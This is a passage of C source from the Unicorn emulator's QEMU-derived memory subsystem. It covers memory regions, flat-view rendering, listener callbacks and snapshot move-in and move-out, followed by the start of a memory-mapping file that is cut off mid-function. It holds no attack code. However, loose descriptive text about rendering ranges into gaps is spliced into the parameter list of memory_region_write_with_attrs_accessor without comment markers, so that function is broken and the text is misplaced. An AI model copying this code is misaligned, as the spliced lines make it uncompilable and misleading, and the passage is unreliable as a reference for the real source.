memmove(&uc->mapped_blocks[i], &uc->mapped_blocks[i + 1], sizeof(MemoryRegion*) * (uc->mapped_block_count - i)); if (free) { mr->destructor(mr); g_free(mr); } break; } } } void memory_moveout(struct uc_struct *uc, MemoryRegion *mr) { hwaddr addr; /* A bit dirty, but it works. * The first subregion will be the one with the smalest priority. * In case of CoW this will always be the region which is mapped initial and later be moved in the subregion of the container. 
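 * (A subregion's priority records the snapshot level at which it was
 * created, so the lowest priority identifies the original mapping.)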
* The initial subregion is the one stored in mapped_blocks * Because CoW is done after the snapshot level is increased there is only on subregion with */ memory_region_transaction_begin(); MemoryRegion *mr_block = QTAILQ_FIRST(&mr->subregions); if (!mr_block) { mr_block = mr; } if (uc->cpu) { // We also need to remove all tb cache uc->uc_invalidate_tb(uc, mr->addr, int128_get64(mr->size)); // Make sure all pages associated with the MemoryRegion are flushed // Only need to do this if we are in a running state for (addr = mr->addr; (int64_t)(mr->end - addr) > 0; addr += uc->target_page_size) { tlb_flush_page(uc->cpu, addr); } } memory_region_del_subregion(uc->system_memory, mr); g_array_append_val(uc->unmapped_regions, mr); memory_region_remove_mapped_block(uc, mr_block, false); uc->memory_region_update_pending = true; memory_region_transaction_commit(uc->system_memory); /* dirty hack to save the snapshot level */ mr->container = (void *)(intptr_t)uc->snapshot_level; } void memory_movein(struct uc_struct *uc, MemoryRegion *mr) { memory_region_transaction_begin(); memory_region_add_subregion_overlap(uc->system_memory, mr->addr, mr, mr->priority); uc->memory_region_update_pending = true; memory_region_transaction_commit(uc->system_memory); } void memory_unmap(struct uc_struct *uc, MemoryRegion *mr) { hwaddr addr; if (uc->cpu) { // We also need to remove all tb cache uc->uc_invalidate_tb(uc, mr->addr, int128_get64(mr->size)); // Make sure all pages associated with the MemoryRegion are flushed // Only need to do this if we are in a running state for (addr = mr->addr; (int64_t)(mr->end - addr) > 0; addr += uc->target_page_size) { tlb_flush_page(uc->cpu, addr); } } memory_region_del_subregion(uc->system_memory, mr); memory_region_remove_mapped_block(uc, mr, true); } int memory_free(struct uc_struct *uc) { MemoryRegion *subregion, *subregion_next; MemoryRegion *mr = uc->system_memory; QTAILQ_FOREACH_SAFE(subregion, &mr->subregions, subregions_link, subregion_next) { subregion->enabled = false; memory_region_del_subregion(uc->system_memory, subregion); subregion->destructor(subregion); /* destroy subregion */ g_free(subregion); } return 0; } static AddrRange addrrange_make(Int128 start, Int128 size) { return (AddrRange) { start, size }; } static bool addrrange_equal(AddrRange r1, AddrRange r2) { return int128_eq(r1.start, r2.start) && int128_eq(r1.size, r2.size); } static Int128 addrrange_end(AddrRange r) { return int128_add(r.start, r.size); } static bool addrrange_contains(AddrRange range, Int128 addr) { return int128_ge(addr, range.start) && int128_lt(addr, addrrange_end(range)); } static bool addrrange_intersects(AddrRange r1, AddrRange r2) { return addrrange_contains(r1, r2.start) || addrrange_contains(r2, r1.start); } static AddrRange addrrange_intersection(AddrRange r1, AddrRange r2) { Int128 start = int128_max(r1.start, r2.start); Int128 end = int128_min(addrrange_end(r1), addrrange_end(r2)); return addrrange_make(start, int128_sub(end, start)); } enum ListenerDirection { Forward, Reverse }; #define MEMORY_LISTENER_CALL_GLOBAL(uc, _callback, _direction) \ do { \ MemoryListener *_listener; \ \ switch (_direction) { \ case Forward: \ QTAILQ_FOREACH(_listener, &uc->memory_listeners, link) { \ if (_listener->_callback) { \ _listener->_callback(_listener); \ } \ } \ break; \ case Reverse: \ QTAILQ_FOREACH_REVERSE(_listener, &uc->memory_listeners, link) { \ if (_listener->_callback) { \ _listener->_callback(_listener); \ } \ } \ break; \ default: \ abort(); \ } \ } while (0) #define 
MEMORY_LISTENER_CALL(_as, _callback, _direction, _section) \ do { \ MemoryListener *_listener; \ \ switch (_direction) { \ case Forward: \ QTAILQ_FOREACH(_listener, &(_as)->listeners, link_as) { \ if (_listener->_callback) { \ _listener->_callback(_listener, _section); \ } \ } \ break; \ case Reverse: \ QTAILQ_FOREACH_REVERSE(_listener, &(_as)->listeners, link_as) { \ if (_listener->_callback) { \ _listener->_callback(_listener, _section); \ } \ } \ break; \ default: \ abort(); \ } \ } while (0) /* No need to ref/unref .mr, the FlatRange keeps it alive. */ #define MEMORY_LISTENER_UPDATE_REGION(fr, as, dir, callback) \ do { \ MemoryRegionSection mrs = section_from_flat_range(fr, \ address_space_to_flatview(as)); \ MEMORY_LISTENER_CALL(as, callback, dir, &mrs); \ } while(0) /* Range of memory in the global map. Addresses are absolute. */ struct FlatRange { MemoryRegion *mr; hwaddr offset_in_region; AddrRange addr; bool readonly; }; #define FOR_EACH_FLAT_RANGE(var, view) \ for (var = (view)->ranges; var < (view)->ranges + (view)->nr; ++var) static inline MemoryRegionSection section_from_flat_range(FlatRange *fr, FlatView *fv) { return (MemoryRegionSection) { .mr = fr->mr, .fv = fv, .offset_within_region = fr->offset_in_region, .size = fr->addr.size, .offset_within_address_space = int128_get64(fr->addr.start), .readonly = fr->readonly, }; } static bool flatrange_equal(FlatRange *a, FlatRange *b) { return a->mr == b->mr && addrrange_equal(a->addr, b->addr) && a->offset_in_region == b->offset_in_region && a->readonly == b->readonly; } static FlatView *flatview_new(MemoryRegion *mr_root) { FlatView *view; view = g_new0(FlatView, 1); view->ref = 1; view->root = mr_root; return view; } /* Insert a range into a given position. Caller is responsible for maintaining * sorting order. 
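 * The backing array is grown geometrically (to at least 10 slots) before
 * the tail is shifted to make room.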
*/ static void flatview_insert(FlatView *view, unsigned pos, FlatRange *range) { if (view->nr == view->nr_allocated) { view->nr_allocated = MAX(2 * view->nr, 10); view->ranges = g_realloc(view->ranges, view->nr_allocated * sizeof(*view->ranges)); } memmove(view->ranges + pos + 1, view->ranges + pos, (view->nr - pos) * sizeof(FlatRange)); view->ranges[pos] = *range; ++view->nr; } static inline void flatview_ref(FlatView *view) { view->ref++; } static void flatview_destroy(FlatView *view) { if (view->dispatch) { address_space_dispatch_free(view->dispatch); } g_free(view->ranges); g_free(view); } void flatview_unref(FlatView *view) { view->ref--; if (view->ref <= 0) { flatview_destroy(view); } } static bool can_merge(FlatRange *r1, FlatRange *r2) { return int128_eq(addrrange_end(r1->addr), r2->addr.start) && r1->mr == r2->mr && int128_eq(int128_add(int128_make64(r1->offset_in_region), r1->addr.size), int128_make64(r2->offset_in_region)) && r1->readonly == r2->readonly; } /* Attempt to simplify a view by merging adjacent ranges */ static void flatview_simplify(FlatView *view) { unsigned i, j; i = 0; while (i < view->nr) { j = i + 1; while (j < view->nr && can_merge(&view->ranges[j-1], &view->ranges[j])) { int128_addto(&view->ranges[i].addr.size, view->ranges[j].addr.size); ++j; } ++i; memmove(&view->ranges[i], &view->ranges[j], (view->nr - j) * sizeof(view->ranges[j])); view->nr -= j - i; } } static bool memory_region_big_endian(MemoryRegion *mr) { #ifdef TARGET_WORDS_BIGENDIAN return mr->ops->endianness != DEVICE_LITTLE_ENDIAN; #else return mr->ops->endianness == DEVICE_BIG_ENDIAN; #endif } static void adjust_endianness(MemoryRegion *mr, uint64_t *data, MemOp op) { if ((op & MO_BSWAP) != devend_memop(mr->ops->endianness)) { switch (op & MO_SIZE) { case MO_8: break; case MO_16: *data = bswap16(*data); break; case MO_32: *data = bswap32(*data); break; case MO_64: *data = bswap64(*data); break; default: g_assert_not_reached(); } } } static inline void memory_region_shift_read_access(uint64_t *value, signed shift, uint64_t mask, uint64_t tmp) { if (shift >= 0) { *value |= (tmp & mask) << shift; } else { *value |= (tmp & mask) >> -shift; } } static inline uint64_t memory_region_shift_write_access(uint64_t *value, signed shift, uint64_t mask) { uint64_t tmp; if (shift >= 0) { tmp = (*value >> shift) & mask; } else { tmp = (*value << -shift) & mask; } return tmp; } static MemTxResult memory_region_read_accessor(struct uc_struct *uc, MemoryRegion *mr, hwaddr addr, uint64_t *value, unsigned size, signed shift, uint64_t mask, MemTxAttrs attrs) { uint64_t tmp; tmp = mr->ops->read(uc, mr->opaque, addr, size); memory_region_shift_read_access(value, shift, mask, tmp); return MEMTX_OK; } static MemTxResult memory_region_read_with_attrs_accessor(struct uc_struct *uc, MemoryRegion *mr, hwaddr addr, uint64_t *value, unsigned size, signed shift, uint64_t mask, MemTxAttrs attrs) { uint64_t tmp = 0; MemTxResult r; r = mr->ops->read_with_attrs(uc, mr->opaque, addr, &tmp, size, attrs); memory_region_shift_read_access(value, shift, mask, tmp); return r; } static MemTxResult memory_region_write_accessor(struct uc_struct *uc, MemoryRegion *mr, hwaddr addr, uint64_t *value, unsigned size, signed shift, uint64_t mask, MemTxAttrs attrs) { uint64_t tmp = memory_region_shift_write_access(value, shift, mask); mr->ops->write(uc, mr->opaque, addr, tmp, size); return MEMTX_OK; } static MemTxResult memory_region_write_with_attrs_accessor(struct uc_struct *uc, MemoryRegion *mr, hwaddr addr, uint64_t *value, unsigned size, signed 
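 * Walk the already-sorted ranges: emit a FlatRange into each hole that
 * precedes an existing range, then advance past the overlap, until the
 * clipped region is exhausted.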
shift, uint64_t mask, MemTxAttrs attrs) { uint64_t tmp = memory_region_shift_write_access(value, shift, mask); return mr->ops->write_with_attrs(uc, mr->opaque, addr, tmp, size, attrs); } static MemTxResult access_with_adjusted_size(struct uc_struct *uc, hwaddr addr, uint64_t *value, unsigned size, unsigned access_size_min, unsigned access_size_max, MemTxResult (*access_fn) (struct uc_struct *uc, MemoryRegion *mr, hwaddr addr, uint64_t *value, unsigned size, signed shift, uint64_t mask, MemTxAttrs attrs), MemoryRegion *mr, MemTxAttrs attrs) { uint64_t access_mask; unsigned access_size; unsigned i; MemTxResult r = MEMTX_OK; if (!access_size_min) { access_size_min = 1; } if (!access_size_max) { access_size_max = 4; } /* FIXME: support unaligned access? */ access_size = MAX(MIN(size, access_size_max), access_size_min); access_mask = MAKE_64BIT_MASK(0, access_size * 8); if (memory_region_big_endian(mr)) { for (i = 0; i < size; i += access_size) { r |= access_fn(uc, mr, addr + i, value, access_size, (size - access_size - i) * 8, access_mask, attrs); } } else { for (i = 0; i < size; i += access_size) { r |= access_fn(uc, mr, addr + i, value, access_size, i * 8, access_mask, attrs); } } return r; } static AddressSpace *memory_region_to_address_space(MemoryRegion *mr) { AddressSpace *as; while (mr->container) { mr = mr->container; } QTAILQ_FOREACH(as, &mr->uc->address_spaces, address_spaces_link) { if (mr == as->root) { return as; } } return NULL; } /* Render a memory region into the global view. Ranges in @view obscure * ranges in @mr. */ static void render_memory_region(FlatView *view, MemoryRegion *mr, Int128 base, AddrRange clip, bool readonly) { MemoryRegion *subregion; unsigned i; hwaddr offset_in_region; Int128 remain; Int128 now; FlatRange fr; AddrRange tmp; if (!mr->enabled) { return; } int128_addto(&base, int128_make64(mr->addr)); readonly |= mr->readonly; tmp = addrrange_make(base, mr->size); if (!addrrange_intersects(tmp, clip)) { return; } clip = addrrange_intersection(tmp, clip); /* Render subregions in priority order. */ QTAILQ_FOREACH(subregion, &mr->subregions, subregions_link) { render_memory_region(view, subregion, base, clip, readonly); } if (!mr->terminates) { return; } offset_in_region = int128_get64(int128_sub(clip.start, base)); base = clip.start; remain = clip.size; fr.mr = mr; fr.readonly = readonly; /* Render the region itself into any gaps left by the current view. 
*/ for (i = 0; i < view->nr && int128_nz(remain); ++i) { if (int128_ge(base, addrrange_end(view->ranges[i].addr))) { continue; } if (int128_lt(base, view->ranges[i].addr.start)) { now = int128_min(remain, int128_sub(view->ranges[i].addr.start, base)); fr.offset_in_region = offset_in_region; fr.addr = addrrange_make(base, now); flatview_insert(view, i, &fr); ++i; int128_addto(&base, now); offset_in_region += int128_get64(now); int128_subfrom(&remain, now); } now = int128_sub(int128_min(int128_add(base, remain), addrrange_end(view->ranges[i].addr)), base); int128_addto(&base, now); offset_in_region += int128_get64(now); int128_subfrom(&remain, now); } if (int128_nz(remain)) { fr.offset_in_region = offset_in_region; fr.addr = addrrange_make(base, remain); flatview_insert(view, i, &fr); } } static MemoryRegion *memory_region_get_flatview_root(MemoryRegion *mr) { while (mr->enabled) { if (!mr->terminates) { unsigned int found = 0; MemoryRegion *child, *next = NULL; QTAILQ_FOREACH(child, &mr->subregions, subregions_link) { if (child->enabled) { if (++found > 1) { next = NULL; break; } if (!child->addr && int128_ge(mr->size, child->size)) { /* A child is included in its entirety. If it's the only * enabled one, use it in the hope of finding an alias down the * way. This will also let us share FlatViews. */ next = child; } } } if (found == 0) { return NULL; } if (next) { mr = next; continue; } } return mr; } return NULL; } /* Render a memory topology into a list of disjoint absolute ranges. */ static FlatView *generate_memory_topology(struct uc_struct *uc, MemoryRegion *mr) { int i; FlatView *view; view = flatview_new(mr); if (mr) { render_memory_region(view, mr, int128_zero(), addrrange_make(int128_zero(), int128_2_64()), false); } flatview_simplify(view); view->dispatch = address_space_dispatch_new(uc, view); for (i = 0; i < view->nr; i++) { MemoryRegionSection mrs = section_from_flat_range(&view->ranges[i], view); flatview_add_to_dispatch(uc, view, &mrs); } address_space_dispatch_compact(view->dispatch); g_hash_table_replace(uc->flat_views, mr, view); return view; } FlatView *address_space_get_flatview(AddressSpace *as) { FlatView *view; view = address_space_to_flatview(as); return view; } static void address_space_update_topology_pass(AddressSpace *as, const FlatView *old_view, const FlatView *new_view, bool adding) { unsigned iold, inew; FlatRange *frold, *frnew; /* Generate a symmetric difference of the old and new memory maps. * Kill ranges in the old map, and instantiate ranges in the new map. */ iold = inew = 0; while (iold < old_view->nr || inew < new_view->nr) { if (iold < old_view->nr) { frold = &old_view->ranges[iold]; } else { frold = NULL; } if (inew < new_view->nr) { frnew = &new_view->ranges[inew]; } else { frnew = NULL; } if (frold && (!frnew || int128_lt(frold->addr.start, frnew->addr.start) || (int128_eq(frold->addr.start, frnew->addr.start) && !flatrange_equal(frold, frnew)))) { /* In old but not in new, or in both but attributes changed. 
*/ if (!adding) { MEMORY_LISTENER_UPDATE_REGION(frold, as, Reverse, region_del); } ++iold; } else if (frold && frnew && flatrange_equal(frold, frnew)) { /* In both and unchanged (except logging may have changed) */ if (adding) { MEMORY_LISTENER_UPDATE_REGION(frnew, as, Forward, region_nop); } ++iold; ++inew; } else { /* In new */ if (adding) { MEMORY_LISTENER_UPDATE_REGION(frnew, as, Forward, region_add); } ++inew; } } } static void flatviews_init(struct uc_struct *uc) { if (uc->flat_views) { return; } uc->flat_views = g_hash_table_new_full(NULL, NULL, NULL, (GDestroyNotify) flatview_unref); if (!uc->empty_view) { uc->empty_view = generate_memory_topology(uc, NULL); /* We keep it alive forever in the global variable. */ flatview_ref(uc->empty_view); g_hash_table_replace(uc->flat_views, NULL, uc->empty_view); } } static void flatviews_reset(struct uc_struct *uc) { AddressSpace *as; if (uc->flat_views) { g_hash_table_destroy(uc->flat_views); uc->flat_views = NULL; } flatviews_init(uc); /* Render unique FVs */ QTAILQ_FOREACH(as, &uc->address_spaces, address_spaces_link) { MemoryRegion *physmr = memory_region_get_flatview_root(as->root); if (g_hash_table_lookup(uc->flat_views, physmr)) { continue; } generate_memory_topology(uc, physmr); } } static void address_space_set_flatview(AddressSpace *as) { FlatView *old_view = address_space_to_flatview(as); MemoryRegion *physmr = memory_region_get_flatview_root(as->root); FlatView *new_view = g_hash_table_lookup(as->uc->flat_views, physmr); assert(new_view); if (old_view == new_view) { return; } flatview_ref(new_view); if (!QTAILQ_EMPTY(&as->listeners)) { FlatView tmpview = { .nr = 0 }, *old_view2 = old_view; if (!old_view2) { old_view2 = &tmpview; } address_space_update_topology_pass(as, old_view2, new_view, false); address_space_update_topology_pass(as, old_view2, new_view, true); } as->current_map = new_view; if (old_view) { flatview_unref(old_view); } } static void address_space_update_topology(AddressSpace *as) { MemoryRegion *physmr = memory_region_get_flatview_root(as->root); flatviews_init(as->uc); if (!g_hash_table_lookup(as->uc->flat_views, physmr)) { generate_memory_topology(as->uc, physmr); } address_space_set_flatview(as); } void memory_region_transaction_begin(void) { } void memory_region_transaction_commit(MemoryRegion *mr) { AddressSpace *as; if (mr->uc->memory_region_update_pending) { flatviews_reset(mr->uc); MEMORY_LISTENER_CALL_GLOBAL(mr->uc, begin, Forward); QTAILQ_FOREACH(as, &mr->uc->address_spaces, address_spaces_link) { address_space_set_flatview(as); } mr->uc->memory_region_update_pending = false; MEMORY_LISTENER_CALL_GLOBAL(mr->uc, commit, Forward); } } static void memory_region_destructor_none(MemoryRegion *mr) { } static void memory_region_destructor_ram(MemoryRegion *mr) { memory_region_filter_subregions(mr, 0); qemu_ram_free(mr->uc, mr->ram_block); } void memory_region_init(struct uc_struct *uc, MemoryRegion *mr, uint64_t size) { memset(mr, 0, sizeof(*mr)); mr->uc = uc; /* memory_region_initfn */ mr->ops = &unassigned_mem_ops; mr->enabled = true; mr->destructor = memory_region_destructor_none; QTAILQ_INIT(&mr->subregions); mr->size = int128_make64(size); if (size == UINT64_MAX) { mr->size = int128_2_64(); } } static uint64_t unassigned_mem_read(void *opaque, hwaddr addr, unsigned size) { #ifdef DEBUG_UNASSIGNED printf("Unassigned mem read " TARGET_FMT_plx "\n", addr); #endif return 0; } static void unassigned_mem_write(void *opaque, hwaddr addr, uint64_t val, unsigned size) { #ifdef DEBUG_UNASSIGNED printf("Unassigned mem 
write " TARGET_FMT_plx " = 0x%"PRIx64"\n", addr, val); #endif } static bool unassigned_mem_accepts(struct uc_struct *uc, void *opaque, hwaddr addr, unsigned size, bool is_write, MemTxAttrs attrs) { return false; } const MemoryRegionOps unassigned_mem_ops = { .valid.accepts = unassigned_mem_accepts, .endianness = DEVICE_NATIVE_ENDIAN, }; bool memory_region_access_valid(struct uc_struct *uc, MemoryRegion *mr, hwaddr addr, unsigned size, bool is_write, MemTxAttrs attrs) { if (mr->ops->valid.accepts && !mr->ops->valid.accepts(uc, mr->opaque, addr, size, is_write, attrs)) { return false; } if (!mr->ops->valid.unaligned && (addr & (size - 1))) { return false; } /* Treat zero as compatibility all valid */ if (!mr->ops->valid.max_access_size) { return true; } if (size > mr->ops->valid.max_access_size || size < mr->ops->valid.min_access_size) { return false; } return true; } static MemTxResult memory_region_dispatch_read1(struct uc_struct *uc, MemoryRegion *mr, hwaddr addr, uint64_t *pval, unsigned size, MemTxAttrs attrs) { *pval = 0; if (mr->ops->read) { return access_with_adjusted_size(uc, addr, pval, size, mr->ops->impl.min_access_size, mr->ops->impl.max_access_size, memory_region_read_accessor, mr, attrs); } else { return access_with_adjusted_size(uc, addr, pval, size, mr->ops->impl.min_access_size, mr->ops->impl.max_access_size, memory_region_read_with_attrs_accessor, mr, attrs); } } MemTxResult memory_region_dispatch_read(struct uc_struct *uc, MemoryRegion *mr, hwaddr addr, uint64_t *pval, MemOp op, MemTxAttrs attrs) { unsigned size = memop_size(op); MemTxResult r; if (!memory_region_access_valid(uc, mr, addr, size, false, attrs)) { *pval = unassigned_mem_read(mr, addr, size); return MEMTX_DECODE_ERROR; } r = memory_region_dispatch_read1(uc, mr, addr, pval, size, attrs); adjust_endianness(mr, pval, op); return r; } MemTxResult memory_region_dispatch_write(struct uc_struct *uc, MemoryRegion *mr, hwaddr addr, uint64_t data, MemOp op, MemTxAttrs attrs) { unsigned size = memop_size(op); if (!memory_region_access_valid(uc, mr, addr, size, true, attrs)) { unassigned_mem_write(mr, addr, data, size); return MEMTX_DECODE_ERROR; } adjust_endianness(mr, &data, op); if (mr->ops->write) { return access_with_adjusted_size(uc, addr, &data, size, mr->ops->impl.min_access_size, mr->ops->impl.max_access_size, memory_region_write_accessor, mr, attrs); } else { return access_with_adjusted_size(uc, addr, &data, size, mr->ops->impl.min_access_size, mr->ops->impl.max_access_size, memory_region_write_with_attrs_accessor, mr, attrs); } } void memory_region_init_io(struct uc_struct *uc, MemoryRegion *mr, const MemoryRegionOps *ops, void *opaque, uint64_t size) { memory_region_init(uc, mr, size); mr->ops = ops ? ops : &unassigned_mem_ops; mr->opaque = opaque; mr->terminates = true; } void memory_region_init_ram_ptr(struct uc_struct *uc, MemoryRegion *mr, uint64_t size, void *ptr) { memory_region_init(uc, mr, size); mr->ram = true; mr->terminates = true; mr->destructor = memory_region_destructor_ram; /* qemu_ram_alloc_from_ptr cannot fail with ptr != NULL. 
*/ assert(ptr != NULL); mr->ram_block = qemu_ram_alloc_from_ptr(uc, size, ptr, mr); } uint64_t memory_region_size(MemoryRegion *mr) { if (int128_eq(mr->size, int128_2_64())) { return UINT64_MAX; } return int128_get64(mr->size); } void memory_region_set_readonly(MemoryRegion *mr, bool readonly) { if (mr->readonly != readonly) { memory_region_transaction_begin(); mr->readonly = readonly; mr->uc->memory_region_update_pending |= mr->enabled; memory_region_transaction_commit(mr); } } void *memory_region_get_ram_ptr(MemoryRegion *mr) { void *ptr; ptr = qemu_map_ram_ptr(mr->uc, mr->ram_block, 0); return ptr; } MemoryRegion *memory_region_from_host(struct uc_struct *uc, void *ptr, ram_addr_t *offset) { RAMBlock *block; block = qemu_ram_block_from_host(uc, ptr, false, offset); if (!block) { return NULL; } return block->mr; } ram_addr_t memory_region_get_ram_addr(MemoryRegion *mr) { return mr->ram_block ? mr->ram_block->offset : RAM_ADDR_INVALID; } static void memory_region_update_container_subregions(MemoryRegion *subregion) { MemoryRegion *mr = subregion->container; MemoryRegion *other; memory_region_transaction_begin(); QTAILQ_FOREACH(other, &mr->subregions, subregions_link) { if (subregion->priority >= other->priority) { QTAILQ_INSERT_BEFORE(other, subregion, subregions_link); goto done; } } QTAILQ_INSERT_TAIL(&mr->subregions, subregion, subregions_link); done: mr->uc->memory_region_update_pending = true; memory_region_transaction_commit(mr); } static void memory_region_add_subregion_common(MemoryRegion *mr, hwaddr offset, MemoryRegion *subregion) { assert(!subregion->container); subregion->container = mr; subregion->addr = offset; subregion->end = offset + int128_get64(subregion->size); memory_region_update_container_subregions(subregion); } void memory_region_add_subregion(MemoryRegion *mr, hwaddr offset, MemoryRegion *subregion) { subregion->priority = 0; memory_region_add_subregion_common(mr, offset, subregion); } void memory_region_add_subregion_overlap(MemoryRegion *mr, hwaddr offset, MemoryRegion *subregion, int priority) { subregion->priority = priority; memory_region_add_subregion_common(mr, offset, subregion); } void memory_region_del_subregion(MemoryRegion *mr, MemoryRegion *subregion) { memory_region_transaction_begin(); assert(subregion->container == mr); subregion->container = NULL; QTAILQ_REMOVE(&mr->subregions, subregion, subregions_link); mr->uc->memory_region_update_pending = true; memory_region_transaction_commit(mr); } static int cmp_flatrange_addr(const void *addr_, const void *fr_) { const AddrRange *addr = addr_; const FlatRange *fr = fr_; if (int128_le(addrrange_end(*addr), fr->addr.start)) { return -1; } else if (int128_ge(addr->start, addrrange_end(fr->addr))) { return 1; } return 0; } static FlatRange *flatview_lookup(FlatView *view, AddrRange addr) { return bsearch(&addr, view->ranges, view->nr, sizeof(FlatRange), cmp_flatrange_addr); } /* Same as memory_region_find, but it does not add a reference to the * returned region. It must be called from an RCU critical section. 
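 * Unicorn runs the emulation single-threaded, so memory_region_find()
 * below calls this directly without taking any additional lock.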
*/ static MemoryRegionSection memory_region_find_rcu(MemoryRegion *mr, hwaddr addr, uint64_t size) { MemoryRegionSection ret = { .mr = NULL }; MemoryRegion *root; AddressSpace *as; AddrRange range; FlatView *view; FlatRange *fr; addr += mr->addr; for (root = mr; root->container; ) { root = root->container; addr += root->addr; } as = memory_region_to_address_space(root); if (!as) { return ret; } range = addrrange_make(int128_make64(addr), int128_make64(size)); view = address_space_to_flatview(as); fr = flatview_lookup(view, range); if (!fr) { return ret; } while (fr > view->ranges && addrrange_intersects(fr[-1].addr, range)) { --fr; } ret.mr = fr->mr; ret.fv = view; range = addrrange_intersection(range, fr->addr); ret.offset_within_region = fr->offset_in_region; ret.offset_within_region += int128_get64(int128_sub(range.start, fr->addr.start)); ret.size = range.size; ret.offset_within_address_space = int128_get64(range.start); ret.readonly = fr->readonly; return ret; } MemoryRegionSection memory_region_find(MemoryRegion *mr, hwaddr addr, uint64_t size) { MemoryRegionSection ret; ret = memory_region_find_rcu(mr, addr, size); return ret; } static void listener_add_address_space(MemoryListener *listener, AddressSpace *as) { FlatView *view; FlatRange *fr; if (listener->begin) { listener->begin(listener); } view = address_space_get_flatview(as); FOR_EACH_FLAT_RANGE(fr, view) { MemoryRegionSection section = section_from_flat_range(fr, view); if (listener->region_add) { listener->region_add(listener, §ion); } } if (listener->commit) { listener->commit(listener); } } static void listener_del_address_space(MemoryListener *listener, AddressSpace *as) { FlatView *view; FlatRange *fr; if (listener->begin) { listener->begin(listener); } view = address_space_get_flatview(as); FOR_EACH_FLAT_RANGE(fr, view) { MemoryRegionSection section = section_from_flat_range(fr, view); if (listener->region_del) { listener->region_del(listener, §ion); } } if (listener->commit) { listener->commit(listener); } } void memory_listener_register(MemoryListener *listener, AddressSpace *as) { listener->address_space = as; QTAILQ_INSERT_TAIL(&as->uc->memory_listeners, listener, link); QTAILQ_INSERT_TAIL(&as->listeners, listener, link_as); listener_add_address_space(listener, as); } void memory_listener_unregister(MemoryListener *listener) { if (!listener->address_space) { return; } listener_del_address_space(listener, listener->address_space); QTAILQ_REMOVE(&listener->address_space->uc->memory_listeners, listener, link); QTAILQ_REMOVE(&listener->address_space->listeners, listener, link_as); listener->address_space = NULL; } void address_space_remove_listeners(AddressSpace *as) { while (!QTAILQ_EMPTY(&as->listeners)) { memory_listener_unregister(QTAILQ_FIRST(&as->listeners)); } } void address_space_init(struct uc_struct *uc, AddressSpace *as, MemoryRegion *root) { as->uc = uc; as->root = root; as->current_map = NULL; QTAILQ_INIT(&as->listeners); QTAILQ_INSERT_TAIL(&uc->address_spaces, as, address_spaces_link); address_space_update_topology(as); } void address_space_destroy(AddressSpace *as) { MemoryRegion *root = as->root; /* Flush out anything from MemoryListeners listening in on this */ memory_region_transaction_begin(); as->root = NULL; memory_region_transaction_commit(root); QTAILQ_REMOVE(&as->uc->address_spaces, as, address_spaces_link); /* At this point, as->dispatch and as->current_map are dummy * entries that the guest should never use. Wait for the old * values to expire before freeing the data. 
*/
    as->root = root;
    flatview_unref(as->current_map);
}

void memory_region_init_ram(struct uc_struct *uc, MemoryRegion *mr, uint64_t size, uint32_t perms)
{
    memory_region_init(uc, mr, size);
    mr->ram = true;
    if (!(perms & UC_PROT_WRITE)) {
        mr->readonly = true;
    }
    mr->perms = perms;
    mr->terminates = true;
    mr->destructor = memory_region_destructor_ram;
    mr->ram_block = qemu_ram_alloc(uc, size, mr);
}

unicorn-2.1.1/qemu/softmmu/memory_mapping.c

/*
 * QEMU memory mapping
 *
 * Copyright Fujitsu, Corp. 2011, 2012
 *
 * Authors:
 *     Wen Congyang <wency@cn.fujitsu.com>
 *
 * This work is licensed under the terms of the GNU GPL, version 2 or later.
 * See the COPYING file in the top-level directory.
 *
 */

#include "qemu/osdep.h"
#include "cpu.h"
#include "sysemu/memory_mapping.h"
#include "exec/memory.h"

//#define DEBUG_GUEST_PHYS_REGION_ADD

static void memory_mapping_list_add_mapping_sorted(MemoryMappingList *list, MemoryMapping *mapping)
{
    MemoryMapping *p;

    QTAILQ_FOREACH(p, &list->head, next) {
        if (p->phys_addr >= mapping->phys_addr) {
            QTAILQ_INSERT_BEFORE(p, mapping, next);
            return;
        }
    }
    QTAILQ_INSERT_TAIL(&list->head, mapping, next);
}

static void create_new_memory_mapping(MemoryMappingList *list, hwaddr phys_addr, hwaddr virt_addr, ram_addr_t length)
{
    MemoryMapping *memory_mapping;

    memory_mapping = g_malloc(sizeof(MemoryMapping));
    memory_mapping->phys_addr = phys_addr;
    memory_mapping->virt_addr = virt_addr;
    memory_mapping->length = length;
    list->last_mapping = memory_mapping;
    list->num++;
    memory_mapping_list_add_mapping_sorted(list, memory_mapping);
}

static inline bool mapping_contiguous(MemoryMapping *map, hwaddr phys_addr, hwaddr virt_addr)
{
    return phys_addr == map->phys_addr + map->length &&
           virt_addr == map->virt_addr + map->length;
}

/*
 * Do [map->phys_addr, map->phys_addr + map->length) and
 * [phys_addr, phys_addr + length) intersect?
 */
static inline bool mapping_have_same_region(MemoryMapping *map, hwaddr phys_addr, ram_addr_t length)
{
    return !(phys_addr + length < map->phys_addr ||
             phys_addr >= map->phys_addr + map->length);
}

/*
 * [map->phys_addr, map->phys_addr + map->length) and
 * [phys_addr, phys_addr + length) intersect; are the virtual addresses
 * in the intersection the same?
 */
static inline bool mapping_conflict(MemoryMapping *map, hwaddr phys_addr, hwaddr virt_addr)
{
    return virt_addr - map->virt_addr != phys_addr - map->phys_addr;
}

/*
 * [map->virt_addr, map->virt_addr + map->length) and
 * [virt_addr, virt_addr + length) intersect, and the physical addresses
 * in the intersection are the same.
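 * mapping_merge() grows the existing mapping downward and/or upward so
 * that it also covers [virt_addr, virt_addr + length).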
*/
static inline void mapping_merge(MemoryMapping *map, hwaddr virt_addr, ram_addr_t length)
{
    if (virt_addr < map->virt_addr) {
        map->length += map->virt_addr - virt_addr;
        map->virt_addr = virt_addr;
    }

    if ((virt_addr + length) > (map->virt_addr + map->length)) {
        map->length = virt_addr + length - map->virt_addr;
    }
}

void memory_mapping_list_add_merge_sorted(MemoryMappingList *list, hwaddr phys_addr, hwaddr virt_addr, ram_addr_t length)
{
    MemoryMapping *memory_mapping, *last_mapping;

    if (QTAILQ_EMPTY(&list->head)) {
        create_new_memory_mapping(list, phys_addr, virt_addr, length);
        return;
    }

    last_mapping = list->last_mapping;
    if (last_mapping) {
        if (mapping_contiguous(last_mapping, phys_addr, virt_addr)) {
            last_mapping->length += length;
            return;
        }
    }

    QTAILQ_FOREACH(memory_mapping, &list->head, next) {
        if (mapping_contiguous(memory_mapping, phys_addr, virt_addr)) {
            memory_mapping->length += length;
            list->last_mapping = memory_mapping;
            return;
        }

        if (phys_addr + length < memory_mapping->phys_addr) {
            /* create a new region before memory_mapping */
            break;
        }

        if (mapping_have_same_region(memory_mapping, phys_addr, length)) {
            if (mapping_conflict(memory_mapping, phys_addr, virt_addr)) {
                continue;
            }

            /* merge this region into memory_mapping */
            mapping_merge(memory_mapping, virt_addr, length);
